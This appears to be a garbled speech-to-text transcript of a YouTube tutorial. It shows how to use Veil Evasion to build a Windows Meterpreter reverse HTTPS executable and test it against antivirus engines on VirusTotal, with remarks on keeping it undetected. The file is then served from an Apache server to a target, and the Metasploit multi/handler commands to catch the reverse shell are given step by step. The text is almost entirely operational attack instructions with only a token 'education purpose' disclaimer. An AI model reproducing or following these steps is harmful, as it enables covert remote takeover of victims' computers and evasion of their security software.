Hi there, welcome back to my YouTube channel. So today we're going to see how to download Veil or install Veil in our Linux operating system. And secondly, we're going to see how to scan that file by using different type of software. And thirdly, we're going to see how to do reverse connection by using that exe file by using Metasploit tools. So without any further delay, let's start our video. So first of all, just open your terminal. And I'm not showing you how to download Veil because it will take quite 5 to 6 minutes to download it. So I'm just skipping this part and I will show you some screenshot over here, and you can see that skin and you can download it that. So it is quite easy method to download it. So after all this installation, just type Veil in your Linux or in your terminal and enter. And after you type Veil, you can see this type of interface you will see. So there are two tools loaded. So we're going to use the number one tool, Evasion tool, and use one and enter. And we are inside the Veil Evasion menu. So list and enter. So this is the player we're going to create it. So we'll use number 15, use 15 and enter. So we have to set all these LOS, L port and processor, and we're going to set this. So we're going to set L port is equals to 8080 and again set L host is equals to 192.168.0.103. This is the IP address you can see over here. If config and enter. So you can see this is the IP address of my Linux operating system, 192.168.0.103 and enter. And processor, set processor 1, sorry, set processor PROCSSORS processor 1, and all has been set. If you see the option, and you can see all has been set, processor 1 and L port 8080 and L host 192.168.0.103, and all has been done. So you can put anything, sleep also, but we will not put that. And L host, L port all been set. So we will just generate the any array is generate and enter. And we have to put some name to that payload. So we'll give the n -1 https. No, we'll put array here, reverse https and enter. And it will took some second, and it has been created over here in fair leave fail output compile reverse and http.exe. So this is the exe file where it has been located. So if we go inside there, one file download, sorry, file system there leave fail output and compile. This is the file that we've been created, reverse https.exe. So after that we created, we'll just scan this file using virus total and open any browser and virus total and go inside here and choose, and this is the file we're gonna scan and open. It will take a few seconds to do it. So our exe file has been scanned. So if we see that this antivirus will not detect our this exe file, but this type of antivirus will detect this file. So there is one thing to be noted, that this antivirus will update their code daily. So if we update Veil daily, then some type of this antivirus will not be detect. So we have to be in the same way. If this antivirus will update their code, then we have to update our exe or our Veil tool as well. So I'm not doing any other method to do this. So it is just for the education purpose. So simply I'm just doing one method only. So our file has been scanned. So after that we'll go in the Metasploit and we'll do our reverse connection. So before we go to the Metasploit, we'll give that scan file to our Apache server. So we'll see in the file system and go inside our exe file where we've been created. We'll go inside live and Veil output compile, and this is the file, and we will copy this file and we will put inside our Apache server and paste here. And if we start our Apache service Apache to start, and if we open 192.1, so this is the IP address 3, and we'll see this exe file. So you can see here, and we'll send this exe file to our target. And now it's time to open Metasploit. So we scan all this file and we put this exe file in our Apache server as well. Now it's time to go inside Metasploit and do the reverse connection. So first we're gonna open our terminal and type msf console. We have the Metasploit already downloaded, and it will take quite a second to open it. And it has been started Metasploit framework. And type use exploit multi it's an earlier handler, and again show option, and we have to set all this L port, L host, and our payload also different. So we have, first of all, we'll set our payload what we're using. So set payload windows METER PRETER Metasploit, and reverse HTTPS, and it has been set. And now it's time to set L host. Set L host is 192.168.0.103, and it has been set. Now it's time to set L port. Set L port is equals to 8080 and enter. Now show option, and all the things has been set. Windows Metasploit reverse HTTP, this is the payload we're gonna do, or we're gonna reverse this. And now it's time to exploit and enter, and it has been started. And I'm not gonna do that with our Windows device, because my browser have some error to do this reverse connection. So I'm just skipping this part as well. So I have shown all the steps how to do reverse connection. So now it's just simply make sure is that go to your Windows and go to this type of Apache server where your Apache or your Apache's IP address. So my Apache IP address was 192.168.0.1.3. Just enter in your Windows, and you will see this type of folder. So this is the exe file. Just simply download in your window, and it will be downloaded and open from your window. Then after that, you will see the reverse connection over here. So only this much is for today. If you like this video, then share with your friend and be connected with us.